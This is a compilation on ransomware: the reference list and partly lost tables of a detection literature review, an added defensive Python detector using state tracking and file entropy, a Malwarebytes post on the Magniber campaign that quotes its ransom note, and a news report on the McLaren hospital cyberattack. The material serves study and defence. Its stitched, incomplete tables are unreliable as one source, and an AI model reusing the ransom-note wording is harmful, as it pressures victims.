[12] Permana, G.R.; Trowbridge, T.E.; Sherborne, B. Ransomware mitigation: An analytical investigation into the effects and trends of ransomware attacks on global business. PsyArXiv 2022.
[13] Kapoor, A.; Gupta, A.; Gupta, R.; Tanwar, S.; Sharma, G.; Davidson, I.E. Ransomware detection, avoidance, and mitigation scheme: A review and future directions. Sustainability 2021, 14, 8.
[14] Cen, M.; Jiang, F.; Qin, X.; Jiang, Q.; Doss, R. Ransomware early detection: A survey. Comput. Netw. 2024, 239, 110138.
[15] Kovács, A. Ransomware: A comprehensive study of the exponentially increasing cybersecurity threat. Insights Reg. Dev. 2022, 4, 96–104.
[16] DS, K.P.; HR, P.K. A Systematic Study on Ransomware Attack: Types, Phases and Recent Variants. In Proceedings of the 2024 5th International Conference on Intelligent Communication Technologies and Virtual Mobile Networks (ICICV), Tirunelveli, India, 11–12 March 2024; pp. 661–668.
[17] Chaithanya, B.; Brahmananda, S. Detecting ransomware attacks distribution through phishing URLs Using Machine Learning. In Computer Networks and Inventive Communication Technologies: Proceedings of Fourth ICCNCT 2021; Springer: Singapore, 2022; pp. 821–832.
[18] Fuertes, W.; Arévalo, D.; Castro, J.D.; Ron, M.; Estrada, C.A.; Andrade, R.; Peña, F.F.; Benavides, E. Impact of social engineering attacks: A literature review. In Developments and Advances in Defense and Security: Proceedings of MICRADS 2021; Springer: Singapore, 2022; pp. 25–35.
[19] Ren, A.; Liang, C.; Hyug, I.; Broh, S.; Jhanjhi, N. A three-level ransomware detection and prevention mechanism. EAI Endorsed Trans. Energy Web 2020, 7, e6.
[20] Fernando, D.W.; Komninos, N.; Chen, T. A study on the evolution of ransomware detection using machine learning and deep learning techniques. IoT 2020, 1, 551–604.
[21] Mohammad, A.H. Ransomware evolution, growth and recommendation for detection. Mod. Appl. Sci. 2020, 14, 68.
[22] Humayun, M.; Jhanjhi, N.; Alsayat, A.; Ponnusamy, V. Internet of things and ransomware: Evolution, mitigation and prevention. Egypt. Inform. J. 2021, 22, 105–117.
[23] Dand, P.; Chudasama, D. A Comparative Study about the Ransomware. J. Adv. Database Manag. Syst. 2021, 8, 8–15.
[24] Begovic, K.; Al-Ali, A.; Malluhi, Q. Cryptographic ransomware encryption detection: Survey. Comput. Secur. 2023, 132, 103349.
[25] Cicala, F.; Bertino, E. Analysis of encryption key generation in modern crypto ransomware. IEEE Trans. Dependable Secur. Comput. 2020, 19, 1239–1253.
[26] Reshmi, T. Information security breaches due to ransomware attacks—A systematic literature review. Int. J. Inf. Manag. Data Insights 2021, 1, 100013.
[27] Mohammad, A.H. Analysis of ransomware on windows platform. Int. J. Comput. Sci. Netw. Secur. 2020, 20, 21–27.
[28] Vasoya, S.; Bhavsar, K.; Patel, N. A systematic literature review on Ransomware attacks. arXiv 2022, arXiv:2212.04063.
[29] Bae, S.I.; Lee, G.B.; Im, E.G. Ransomware detection using machine learning algorithms. Concurr. Comput. Pract. Exp. 2020, 32, e5422.
[30] Lemmou, Y.; Lanet, J.L.; Souidi, E.M. A behavioural in-depth analysis of ransomware infection. IET Inf. Secur. 2021, 15, 38–58.
[31] Anand, V.K.; Bamanjogi, K.; Shaw, A.R.; Faheem, M. Comparative study of ransomwares. In Proceedings of the 2022 7th International Conference on Computing, Communication and Security (ICCCS), Seoul, Republic of Korea, 3–5 November 2022; pp. 1–9.
[32] Olaimat, M.N.; Maarof, M.A.; Al-rimy, B.A.S. Ransomware anti-analysis and evasion techniques: A survey and research directions. In Proceedings of the 2021 3rd International Cyber Resilience Conference (CRC), Langkawi Island, Malaysia, 29–31 January 2021; pp. 1–6.
[33] August, T.; Dao, D.; Niculescu, M.F. Economics of ransomware: Risk interdependence and large-scale attacks. Manag. Sci. 2022, 68, 8979–9002.
[34] Lee, I.; Roh, H.; Lee, W. Encrypted malware traffic detection using incremental learning. In Proceedings of the IEEE INFOCOM 2020-IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS), Toronto, ON, Canada, 6–9 July 2020; pp. 1348–1349.
[35] Mahajan, A.; Chakrabarty, N.; Majithia, J.; Ahuja, A.; Agarwal, U.; Suryavanshi, S.; Biradar, M.; Sharma, P.; Raghavan, B.; Arafath, R.; et al. Multisystem imaging recommendations/guidelines: In the pursuit of precision oncology. Indian J. Med. Paediatr. Oncol. 2023, 44, 002–025.
[36] Ghouti, L.; Imam, M. Malware classification using compact image features and multiclass support vector machines. IET Inf. Secur. 2020, 14, 419–429.
[37] Akhtar, M.S.; Feng, T. Malware analysis and detection using machine learning algorithms. Symmetry 2022, 14, 2304.
[38] Hwang, J.; Kim, J.; Lee, S.; Kim, K. Two-stage ransomware detection using dynamic analysis and machine learning techniques. Wirel. Pers. Commun. 2020, 112, 2597–2609.
[39] Mezquita, Y.; Alonso, R.S.; Casado-Vara, R.; Prieto, J.; Corchado, J.M. A review of k-nn algorithm based on classical and quantum machine learning. In Distributed Computing and Artificial Intelligence, Special Sessions, 17th International Conference; Springer: Cham, Switzerland, 2021; pp. 189–198.
[40] Saadat, S.; Joseph Raymond, V. Malware classification using CNN-XGBoost model. In Artificial Intelligence Techniques for Advanced Computing Applications: Proceedings of ICACT 2020; Springer: Cham, Switzerland, 2021; pp. 191–202.
[41] Shah, K.; Patel, H.; Sanghvi, D.; Shah, M. A comparative analysis of logistic regression, random forest and KNN models for the text classification. Augment. Hum. Res. 2020, 5, 12.
[42] Faruk, M.J.H.; Shahriar, H.; Valero, M.; Barsha, F.L.; Sobhan, S.; Khan, M.A.; Whitman, M.; Cuzzocrea, A.; Lo, D.; Rahman, A.; et al. Malware detection and prevention using artificial intelligence techniques. In Proceedings of the 2021 IEEE International Conference on Big Data (Big Data), Orlando, FL, USA, 15–18 December 2021; pp. 5369–5377.
[43] Stoian, N.A. Machine Learning for Anomaly Detection in IoT Networks: Malware Analysis on the IoT-23 Data Set. Bachelor’s Thesis, University of Twente, Enschede, The Netherlands, 2020.
[44] Goyal, M.; Kumar, R. The pipeline process of signature-based and behavior-based malware detection. In Proceedings of the 2020 IEEE 5th International Conference on Computing Communication and Automation (ICCCA), Greater Noida, India, 30–31 October 2020; pp. 497–502.
[45] Sun, N.; Ding, M.; Jiang, J.; Xu, W.; Mo, X.; Tai, Y.; Zhang, J. Cyber threat intelligence mining for proactive cybersecurity defense: A survey and new perspectives. IEEE Commun. Surv. Tutor. 2023, 25, 1748–1774.
[46] Sharmeen, S.; Ahmed, Y.A.; Huda, S.; Koçer, B.Ş.; Hassan, M.M. Avoiding future digital extortion through robust protection against ransomware threats using deep learning based adaptive approaches. IEEE Access 2020, 8, 24522–24534.
[47] Swami, S.; Swami, M.; Nidhi, N. Ransomware Detection System and Analysis Using Latest Tool. Int. J. Adv. Res. Sci. Commun. Technol. 2021, 7, 2581–9429.
[48] Arabo, A.; Dijoux, R.; Poulain, T.; Chevalier, G. Detecting ransomware using process behavior analysis. Procedia Comput. Sci. 2020, 168, 289–296.
[49] Manavi, F.; Hamzeh, A. A new method for ransomware detection based on PE header using convolutional neural networks. In Proceedings of the 2020 17th International ISC Conference on Information Security and Cryptology (ISCISC), Tehran, Iran, 9–10 September 2020; pp. 82–87.
[50] Singh, D.; Mohanty, N.P.; Swagatika, S.; Kumar, S. Cyber-hygiene: The key concept for cyber security in cyberspace. Test Eng. Manag. 2020, 83, 8145–8152.
[51] Kitchen, D.E.; Valach, A.P. How to Avoid the Ransomware Onslaught. Natl. Def. 2020, 105, 18–19.
[52] Möller, D.P. Ransomware Attacks and Scenarios: Cost Factors and Loss of Reputation. In Guide to Cybersecurity in Digital Transformation: Trends, Methods, Technologies, Applications and Best Practices; Springer: Cham, Switzerland, 2023; pp. 273–303.
[53] Berrueta, E.; Morato, D.; Magaña, E.; Izal, M. Crypto-ransomware detection using machine learning models in file-sharing network scenarios with encrypted traffic. Expert Syst. Appl. 2022, 209, 118299.
[54] Lubin, A. The Law and Politics of Ransomware. Vand. J. Transnat’l L. 2022, 55, 1177.
[55] Uandykova, M.; Lisin, A.; Stepanova, D.; Baitenova, L.; Mutaliyeva, L.; Yüksel, S.; Dincer, H. The social and legislative principles of counteracting ransomware crime. Entrep. Sustain. Issues 2020, 8, 777–798.
[56] Force, R.T. Combating Ransomware; Intel Security Group: Plano, TX, USA, 2021.
[57] Ryan, P.; Fokker, J.; Healy, S.; Amann, A. Dynamics of targeted ransomware negotiation. IEEE Access 2022, 10, 32836–32844.
[58] AlSabeh, A.; Safa, H.; Bou-Harb, E.; Crichigno, J. Exploiting ransomware paranoia for execution prevention. In Proceedings of the ICC 2020-2020 IEEE International Conference on Communications (ICC), Dublin, Ireland, 7–11 June 2020; pp. 1–6.
[59] Urooj, U.; Al-rimy, B.A.S.; Zainal, A.; Ghaleb, F.A.; Rassam, M.A. Ransomware detection using the dynamic analysis and machine learning: A survey and research directions. Appl. Sci. 2021, 12, 172.
[60] Chittooparambil, H.J.; Shanmugam, B.; Azam, S.; Kannoorpatti, K.; Jonkman, M.; Samy, G.N. A review of ransomware families and detection methods. In Recent Trends in Data Science and Soft Computing: Proceedings of the 3rd International Conference of Reliable Information and Communication Technology (IRICT 2018); Springer: Cham, Switzerland, 2019; pp. 588–597.
[61] Sechel, S. A comparative assessment of obfuscated ransomware detection methods. Inform. Econ. 2019, 23, 45–62.
[62] Bijitha, C.; Sukumaran, R.; Nath, H.V. A survey on ransomware detection techniques. In Secure Knowledge Management in Artificial Intelligence Era: 8th International Conference, SKM 2019, Goa, India, 21–22 December 2019; Proceedings 8; Springer: Cham, Switzerland, 2020; pp. 55–68.
[63] Ramesh, G.; Menen, A. Automated dynamic approach for detecting ransomware using finite-state machine. Decis. Support Syst. 2020, 138, 113400.
[64] Puat, H.A.M.; Abd Rahman, N.A. Ransomware as a service and public awareness. PalArch’s J. Archaeol. Egypt/Egyptol. 2020, 17, 5277–5292.
[65] Beerman, J.; Berent, D.; Falter, Z.; Bhunia, S. A review of colonial pipeline ransomware attack. In Proceedings of the 2023 IEEE/ACM 23rd International Symposium on Cluster, Cloud and Internet Computing Workshops (CCGridW), Bangalore, India, 1–4 May 2023; pp. 8–15.
[66] Zimba, A.; Chishimba, M. On the economic impact of crypto-ransomware attacks: The state of the art on enterprise systems. Eur. J. Secur. Res. 2019, 4, 3–31.
[67] Liluashvili, G.B. Cyber risk mitigation in higher education. Law World 2021, 17, 15.
[68] Khammas, B.M. Ransomware detection using random forest technique. ICT Express 2020, 6, 325–331.
[69] Poudyal, S.; Dasgupta, D. AI-powered ransomware detection framework. In Proceedings of the 2020 IEEE Symposium Series on Computational Intelligence (SSCI), Canberra, ACT, Australia, 1–4 December 2020; pp. 1154–1161.
[70] Alqahtani, A.; Gazzan, M.; Sheldon, F.T. A proposed crypto-ransomware early detection (CRED) model using an integrated deep learning and vector space model approach. In Proceedings of the 2020 10th Annual Computing and Communication Workshop and Conference (CCWC), Las Vegas, NV, USA, 6–8 January 2020; pp. 0275–0279.
[71] Khan, F.; Ncube, C.; Ramasamy, L.K.; Kadry, S.; Nam, Y. A digital DNA sequencing engine for ransomware detection using machine learning. IEEE Access 2020, 8, 119710–119719.
[72] Ahmed, Y.A.; Kocer, B.; Al-rimy, B.A.S. Automated analysis approach for the detection of high survivable ransomware. KSII Trans. Internet Inf. Syst. (TIIS) 2020, 14, 2236–2257.
[73] Davies, S.R.; Macfarlane, R.; Buchanan, W.J. Differential area analysis for ransomware attack detection within mixed file datasets. Comput. Secur. 2021, 108, 102377.
[74] Noorbehbahani, F.; Saberi, M. Ransomware detection with semi-supervised learning. In Proceedings of the 2020 10th International Conference on Computer and Knowledge Engineering (ICCKE), Mashhad, Iran, 29–30 October 2020; pp. 024–029.
[75] Bello, I.; Chiroma, H.; Abdullahi, U.A.; Gital, A.Y.; Jauro, F.; Khan, A.; Okesola, J.O.; Abdulhamid, S.M. Detecting ransomware attacks using intelligent algorithms: Recent development and next direction from deep learning and big data perspectives. J. Ambient. Intell. Humaniz. Comput. 2021, 12, 8699–8717.
[76] van Boven, L.S.; Kusters, R.W.; Tin, D.; van Osch, F.H.; De Cauwer, H.; Ketelings, L.; Rao, M.; Dameff, C.; Barten, D.G. Hacking acute care: A qualitative study on the health care impacts of ransomware attacks against hospitals. Ann. Emerg. Med. 2024, 83, 46–56.
[77] Urooj, U.; Maarof, M.A.B.; Al-rimy, B.A.S. A proposed adaptive pre-encryption crypto-ransomware early detection model. In Proceedings of the 2021 3rd International Cyber Resilience Conference (CRC), Langkawi Island, Malaysia, 29–31 January 2021.
[78] Roy, K.C.; Chen, Q. DeepRan: Attention-based BiLSTM and CRF for ransomware early detection and classification. Inf. Syst. Front. 2021, 23, 299–315.
| Year | Targeted Organization | Ransomware Used | Impact of Attack |
| --- | --- | --- | --- |
| 2020 | University of California | NetWalker | 1.14 million paid and academic data encrypted |
| 2020 | Garmin | WastedLocker | Major service outage and 10 million reportedly paid |
| 2020 | Software AG | Clop | Data stolen and leaked, and 20 million demanded |
| 2021 | Colonial Pipeline | DarkSide | Fuel supply disruption and 4.4 million paid |
| 2021 | JBS Foods (one of the world’s largest meat processors) | REvil/Sodinokibi | Global meat supply affected and 11 million paid |
| 2021 | Kaseya | REvil/Sodinokibi | Managed Service Provider and their clients affected globally |
| 2022 | Costa Rica Government | Conti | National healthcare and finance systems disrupted |
| 2022 | Kronos | Unknown | Payroll and HR services for numerous companies disrupted |
| 2023 | Horizon Healthcare | (not stated) | Encrypting patient data and disrupting medical services, highlighting the vulnerability of the healthcare sector |
| Statistic | Value |
| --- | --- |
| Global ransomware attacks (2021) | 623.3 million |
| Global ransomware attacks (H1 2022) | 236.1 million |
| Drop in ransomware attacks (2022 vs. 2021) | 23% |
| Percentage of cyber crimes attributed to ransomware (2022) | 20% |
| Ransomware attributed to Windows-based executables | 93% |
| Common entry point for ransomware | Phishing |
| US share of global ransomware attacks | 47% |
| Manufacturing industry attacks attributed to ransomware (2021) | Most common |
| Ransomware attacks that fail or result in zero losses | 90% |
| Average ransomware payment (2021) | USD 570,000 |
| Increase in average ransomware payment (2020 to 2021) | 82% |
| REvil ransomware group’s share of attacks (2021) | 37% |
| Top affected countries (ransomware attacks) | Israel, South Korea, Vietnam, China, Singapore, India, Kazakhstan, Philippines, Iran, UK |
| Top affected organizations’ countries (ransomware attacks) | USA, Italy, Australia, Brazil, Germany |
| Number of ransomware families identified | 130 |
| Percentage of ransomware attacks due to phishing | 41% |
| Estimated global successful ransomware attacks (May 2021–June 2022) | 3640 |
| Organizations expecting ransomware attack (Canada) | 65% |
| Largest ransom paid (JBS, 2021) | USD 11 million |
| Ransomware incidents reported to FBI (Jan–July 2021) | 2084 incidents, USD 16.8 million losses |
| Predicted frequency of ransomware attacks by 2031 | Every 2 s |
| Healthcare sector losses due to ransomware (US, 2021) | USD 7.8 billion |
| Year | Key Developments | Impact |
| --- | --- | --- |
| 1980s | Introduction of AIDS Trojan via floppy disks | First known ransomware; limited in scope. |
| 2000s | Use of advanced encryption to lock files | Increased difficulty in decrypting files without payment. |
| 2010s | Rise of cryptocurrency; notable attacks like WannaCry | Global spread; significant financial and operational impacts. |
| 2020s | Targeted attacks on businesses and governments | Larger ransoms and higher stakes in disruptions. |
| Year | Notable Ransomware | Main Features | Impact |
| --- | --- | --- | --- |
| 1989 | AIDS Trojan | First ransomware | Asked for payment through the mail; locked file names, not the files themselves. |
| 2005 | Gpcode | Uses weak RSA encryption | Early use of asymmetric encryption but with weak key sizes, allowing decryption without paying. |
| 2013 | CryptoLocker | Strong RSA-2048 encryption | Started using very strong encryption, causing big losses and marking the start of modern ransomware. |
| 2015 | Locky, TeslaCrypt | Widespread use, targeted various file types | Advanced on previous attacks by improving encryption strength and targeting a wider array of file types; became highly profitable. |
| 2016 | Petya, NotPetya | Disk encryption and wiping capabilities | Innovated by encrypting entire disks and spreading within networks; NotPetya masqueraded as ransomware but primarily caused disruption. |
| 2017 | WannaCry, Bad Rabbit | Exploited EternalBlue vulnerability | Caused global panic due to rapid spread through networks by exploiting unpatched Windows Server Message Block (SMB) protocol vulnerabilities (SMB is a network protocol used for file sharing); prompted urgent global security updates. |
| 2019 | Maze | Double extortion technique | Started the trend of stealing data before encrypting devices, threatening to release the data if the ransom was not paid. |
| 2020 | Sodinokibi | Targeted big companies, used a partner model | Aimed at large, important targets and expanded the idea of ransomware-as-a-service, allowing more attackers to participate. |
| 2021 | DarkSide, REvil | Hit supply chains and crucial services | Major incidents like the Colonial Pipeline attack highlighted the threat to critical infrastructure and supply chains. |
| 2022 | LockBit | Automated and sophisticated operations | Introduced automated attack systems to maximize impact and efficiency, further refining the ransomware-as-a-service model. |
| Detection Method | Advantages | Disadvantages |
| --- | --- | --- |
| Signature-based | | |
| Heuristic-based | | |
| Anomaly-based | | |
| Machine Learning-based | | |
| Hybrid | | |

(The advantage and disadvantage cells of this table did not survive extraction.)
| Mentioned Criteria | Suggestions for Improvements |
| --- | --- |
| Overview of ransomware attacks | |
| Types of ransomware | Identify the types of ransomware attacks |
| Ransomware attack vectors | Explain in more detail |
| Signs of a ransomware attack | Elaborate the different signs of ransomware attacks |
| Challenges in early detection of ransomware | Explain the challenges in detail |
| Advanced technologies in detection | Explain the role of advanced technologies in detection |
| Taxonomy of ransomware | Explain in more detail |
| Preventive, avoidance, mitigation measures | |
| Regulatory and legal considerations | Discuss regulatory and legal considerations |
| Ransomware framework | Explain in more detail |
| Effectiveness and limitations of current detection methods | |
| Real-world incidents | Provide some real-world incidents |

(The original table also had columns marking which criteria are covered by this paper and by three compared review papers; those marks and reference numbers did not survive extraction.)
Taxonomy table: Ref. | AI | ML/DL | Semi-Supervised Learning | Static/Dynamic Analysis | Behavioral Analysis | Anomaly/Signature-Based Detection | Differential Area Analysis (the reference numbers and per-technique marks in this table did not survive extraction; the final row is marked N/A in every column).
Table of surveyed detection proposals (columns: Ref., Proposed Method Name, Methodology, Parameters, Platform, Objective, Solution, Results; citation numbers were lost in extraction):

  • [ ] CRED
    Methodology: process- and data-centric detection techniques and DL
    Parameters: performance
    Platform: k-fold cross-validation
    Objective: enhance detection accuracy and reduce false alarm rates.
    Solution: accurate determination of pre-encryption stage boundaries.
    Results: proposal only, not yet implemented.

  • [ ] 3LS
    Methodology: signature- and anomaly-based detection
    Parameters: security
    Platform: N/A
    Objective: decrease, identify, and prevent different types of attacks.
    Solution: a virtual machine (VM), a browser extension, and anti-malware solutions running inside the VM.
    Results: the proposed model can isolate suspicious files before they execute any harmful activity, but running multiple VMs simultaneously is difficult for a single computer.

  • [ ] Not identified
    Methodology: finite-state machine model
    Parameters: accuracy
    Platform: .NET Framework 4.5.2
    Objective: detect different types of ransomware accurately with a low number of false predictions.
    Solution: identify ransomware attacks from the current state of the computer system.
    Results: the proposed model identified ransomware attacks with 99.55% accuracy and a 0% false-positive rate.

  • [ ] Not identified
    Methodology: ML
    Parameters: security and performance
    Platform: random forest, decision tree, and neural network
    Objective: pre-detection of ransomware attacks.
    Solution: analysis of 7 ransomware, 41 benign software, and 34 malware samples.
    Results: the proposed method differentiated between benign applications and ransomware with low false-positive and false-negative rates.

  • [ ] Not identified
    Methodology: Shannon entropy used to distinguish legitimately high-entropy files from encrypted files
    Parameters: performance
    Platform: isolated target machine
    Objective: determine the time at which encrypted files are created.
    Solution: a model that classifies encrypted files reliably even when the dataset also contains high-entropy (for example compressed) files.
    Results: the proposed model reached a success rate above 99.96% when examining only the first 192 bytes of a file.

  • [ ] DNAact-Ran
    Methodology: digital DNA sequencing design constraints and k-mer frequency vectors
    Parameters: performance and accuracy
    Platform: Java (version 1.8)
    Objective: pre-detection of ransomware before encryption occurs.
    Solution: ransomware detection using ML and a digital DNA sequencing engine.
    Results: the proposed method detected ransomware accurately and effectively.

  • [ ] An adaptive pre-encryption model
    Methodology: dynamic analysis and an annotated term frequency-inverse document frequency (TF-IDF) technique
    Parameters: accuracy
    Platform: not implemented yet
    Objective: detect ransomware families that continuously change their behavior, keeping the model's knowledge of attack behavior up to date.
    Solution: a pre-encryption detection model trained on several datasets and feature selections.
    Results: not implemented yet.

  • [ ] DeepRan
    Methodology: TF-IDF, a Conditional Random Fields (CRF) model, and an incremental learning method
    Parameters: accuracy
    Platform: an LSTM model trained on the processed host logs to flag suspicious entries
    Objective: a DL-based detector that detects and classifies ransomware early enough to prevent network-wide data encryption.
    Solution: a fully connected (FC) layer and an attention-based bidirectional LSTM (BiLSTM) model the normal behavior of hosts in an operating enterprise system and flag anomalous activity in large volumes of log data.
    Results: DeepRan achieved an F1-score of 99.02% and a detection accuracy of 99.87% for early ransomware detection.
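Two rows of the table describe techniques concretely enough to illustrate: a finite-state machine driven by the current state of the system, and Shannon entropy used to tell encrypted output apart from ordinary file writes. The following is an added example, not code from the review or from any of the surveyed papers. It combines the two ideas in one small detector: per-process states IDLE, SCANNING, ENCRYPTING, ALERT advance on directory enumeration, high-entropy in-place overwrites, and a subsequent rename. The event schema, the thresholds (7.0 bits per byte, three overwrites) and the SHA-256 counter stream used to stand in for ciphertext are all assumptions made for the demo, and the event stream is constructed, not captured from a real host. The overwrite check is the caveat the entropy approach needs: a benign program that creates a new compressed or encrypted file is high-entropy too, so only in-place rewrites of existing files count.

```python
import math
import hashlib
from collections import Counter, defaultdict

# Thresholds are assumptions for this demo, not values taken from the review.
ENTROPY_THRESHOLD = 7.0        # bits per byte; plaintext documents sit well below this
ENCRYPT_WRITES_TO_ALERT = 3    # high-entropy overwrites required before a rename triggers an alert


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a buffer in bits per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pseudo_ciphertext(length: int, seed: bytes = b"demo") -> bytes:
    """Deterministic high-entropy bytes standing in for a ransomware's encrypted output.

    SHA-256 in counter mode is used only so the demo is reproducible offline; it is not
    an encryption scheme and says nothing about any real ransomware's cipher (assumption).
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


class RansomwareFSM:
    """Per-process finite-state machine over file-system events (hypothetical schema).

    IDLE -> SCANNING   : repeated directory enumeration
         -> ENCRYPTING : in-place overwrite of an existing file with high-entropy data
         -> ALERT      : enough such overwrites followed by a rename (e.g. to a new extension)
    """

    def __init__(self) -> None:
        self.state = defaultdict(lambda: "IDLE")
        self.enumerations = defaultdict(int)
        self.encrypt_writes = defaultdict(int)
        self.alerts = []   # (pid, path) pairs

    def feed(self, ev: dict) -> str:
        pid, op = ev["pid"], ev["op"]
        state = self.state[pid]
        if op == "enum":
            self.enumerations[pid] += 1
            if state == "IDLE" and self.enumerations[pid] >= 2:
                self.state[pid] = "SCANNING"
        elif op == "write":
            # Only in-place overwrites count: a benign process creating a brand-new
            # compressed or encrypted file is high-entropy too and must not trip this.
            if ev.get("overwrite") and shannon_entropy(ev["data"]) >= ENTROPY_THRESHOLD:
                self.encrypt_writes[pid] += 1
                if state == "SCANNING":
                    self.state[pid] = "ENCRYPTING"
        elif op == "rename" and state == "ENCRYPTING":
            if self.encrypt_writes[pid] >= ENCRYPT_WRITES_TO_ALERT:
                self.state[pid] = "ALERT"
                self.alerts.append((pid, ev["path"]))
        return self.state[pid]


def run_demo() -> RansomwareFSM:
    """Feed a constructed event stream: a benign editor (pid 100) and a ransomware-like process (pid 200)."""
    report = b"Quarterly report: revenue grew 4% year over year. " * 80
    events = [
        # benign: saves a text document in place, then creates a new high-entropy backup file
        {"pid": 100, "op": "write", "path": "C:/Users/a/report.txt", "data": report, "overwrite": True},
        {"pid": 100, "op": "write", "path": "C:/Users/a/backup.bin", "data": pseudo_ciphertext(4096), "overwrite": False},
        # ransomware-like: enumerates folders, overwrites documents with ciphertext, renames them
        {"pid": 200, "op": "enum", "path": "C:/Users/a/Documents"},
        {"pid": 200, "op": "enum", "path": "C:/Users/a/Pictures"},
        {"pid": 200, "op": "write", "path": "C:/Users/a/Documents/q1.xlsx", "data": pseudo_ciphertext(4096, b"q1"), "overwrite": True},
        {"pid": 200, "op": "write", "path": "C:/Users/a/Documents/q2.xlsx", "data": pseudo_ciphertext(4096, b"q2"), "overwrite": True},
        {"pid": 200, "op": "write", "path": "C:/Users/a/Documents/q3.xlsx", "data": pseudo_ciphertext(4096, b"q3"), "overwrite": True},
        {"pid": 200, "op": "rename", "path": "C:/Users/a/Documents/q1.xlsx", "new_path": "C:/Users/a/Documents/q1.xlsx.locked"},
    ]
    fsm = RansomwareFSM()
    for ev in events:
        fsm.feed(ev)
    return fsm


if __name__ == "__main__":
    demo = run_demo()
    print("alerts:", demo.alerts)
    print("states:", dict(demo.state))
```

Running it reports one alert for pid 200 and leaves the benign editor in IDLE. The entropy is computed over whole write buffers here; the surveyed work reports that the first 192 bytes of a file already suffice, which is what makes the approach cheap enough to sit on the write path, but the window length is a tuning choice and a compressed archive's header can still look like ciphertext over a short window, so the process-level state is what keeps the false-positive rate down.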
Albshaier, L.; Almarri, S.; Rahman, M.M.H. Earlier Decision on Detection of Ransomware Identification: A Comprehensive Systematic Literature Review. Information 2024, 15, 484. https://doi.org/10.3390/info15080484

Magniber ransomware targets home users

If you’ve been following any news about ransomware, you may be under the impression that ransomware groups are only after organizations rather than individual people, and for the most part that’s true.

However, Magniber is one ransomware family that does target home users. And it’s back, with full force, demanding four-figure ransoms to decrypt data.

BleepingComputer, which has a dedicated forum for ransomware victims, reports:

“A massive Magniber ransomware campaign is underway, encrypting home users’ devices worldwide and demanding thousand-dollar ransoms to receive a decryptor.”

This surge was confirmed by ID-Ransomware, a service that helps users identify the ransomware family that has infected their systems. ID-Ransomware has received well over 700 submissions from visitors whose files were encrypted by Magniber since July 20, 2024. Malwarebytes’ telemetry also shows an uptick in Magniber detections in July.

Magniber first emerged in 2017, when it targeted South Korean systems. In 2018, it started infecting computers with a much more developed version, which also targeted other Asian countries such as Malaysia, Taiwan, and Hong Kong.

The new campaign does not limit itself to specific regions and uses tried and trusted methods to reach home users’ systems. The ransomware is often disguised in downloads of cracks or key generators for popular software, as well as in fake updates for Windows or browsers. In some cases, the group takes advantage of unpatched Windows vulnerabilities.

When infected, victims are presented with this ransom notice:

Magniber ransom note

Your important files have been encrypted due to the suspicion of the illegal content download! Your files are not damaged! Your files are modified only. This modification is reversible. Any attempts to restore your files with the third party software will be fatal to your files! To receive the private key and decryption program follow the instructions below:

The instructions will tell you to visit a website which can only be reached using the Tor browser.

Once the ransomware has encrypted the targeted files, it typically requests a ransom in the region of $1,000, which rises to around $5,000 if the victim does not pay within three days. Unfortunately, the old decryptors that were available for free do not work for this version.

How home users can prevent ransomware

There are some rules that can help you avoid falling victim to this type of ransomware:

  • Make sure your system and software are on the latest version. Criminals exploit known vulnerabilities that vendors have already patched but that remain unpatched on many machines.
  • Run a trusted anti-malware solution.
  • Never download illegal software, cracks, or key generators.
  • Use a malicious content blocker to stop your browser from visiting bad sites.
  • Don’t open unexpected email attachments.
  • Don’t click on links before checking where they will take you.

If you do accidentally get caught by ransomware, we recommend you don’t pay. There’s no guarantee you’ll get your files back, and you’ll be helping to line the pockets of criminals.

Malwarebytes Artificial Intelligence module blocks the latest Magniber versions as Malware.AI.{ID-nr}. Older versions will be detected as Ransom.Magniber or Ransom.Magniber.Generic.

ABOUT THE AUTHOR

Pieter Arntz

Was a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich mahogany and leather-bound books.


Radiation treatments, stroke care resume at McLaren and Karmanos sites after cyberattack

McLaren Health Care was still working to fully restore operations at its 13 Michigan hospitals and medical offices a week after a cyberattack rattled the Grand Blanc-based health system, forcing delays in radiation treatments for cancer patients, diagnostic heart testing, as well as other procedures.

It remained unclear whether the Aug. 5 cyberattack breached the personal data of patients or employees, according to a status update McLaren issued Monday evening.

There also was no timeline for when McLaren's tech systems will be fully restored, McLaren spokesperson David Jones told the Free Press.

"Emergency departments continue to be operational and open to patients arriving for care. A few locations are on ambulance diversion for certain conditions (meaning emergency teams will transport patients to the next closest facility), and those locations remain in regular communication with their local medical control authorities to ensure efficient coordination between facilities," the statement said.

Jones said each hospital's emergency department was working with its local medical control authority to determine on a case-by-case basis when ambulances should be diverted to other hospitals.

"It is only for certain conditions," he said, "and can vary by day and location."

The Comprehensive Stroke Centers at McLaren Flint and McLaren Macomb are fully operational, the health system said, and all radiation therapy units at Karmanos Cancer Institute facilities across Michigan have resumed treating cancer patients.

"Some sites ... started treating patients over the weekend," McLaren's statement said. "This includes Gamma Knife Radiosurgery in Farmington Hills and the McLaren Proton Therapy Center in Flint. Patients whose appointments were delayed should expect a call from their care team, who are working diligently to reschedule appointments."

Though intermittent problems with the telephone system persist, McLaren said its primary and specialty care offices are "largely operational" and patients once again are able to make appointments. In addition, the McLarenNow platform, which is used for virtual medical appointments, is functioning and can be accessed at mclaren.org/now.

However, McLaren's statement noted that there are ongoing problems accessing many of its other tech systems, so there could be longer than usual wait times and patients are urged to bring the following paper documents to appointments:

  • A list of current medications or empty prescription bottles.
  • Printed physician orders for imaging studies or treatments. 
  • Printed results of recent lab tests available in the patient portals.
  • A list of allergies.

"We remain truly grateful for the tireless effort and dedication displayed by our team members under these demanding circumstances, and we sincerely regret any impact this cyber attack may have had on our patients," the statement said.

This isn't the first time a cyberattack at McLaren has had ripple effects that disrupted patient care.

Last August, a ransomware gang known as BlackCat/AlphV claimed responsibility for another attack on McLaren, posting online that it stole 6 terabytes of data, including the personal information of 2.5 million patients.

The health system reported at the time that it had shut down its own computer networks "out of an abundance of caution" after its information technology security team found suspicious activity during routine monitoring.

Jones told the Free Press last week that the current cyberattack is not connected to the previous breach.

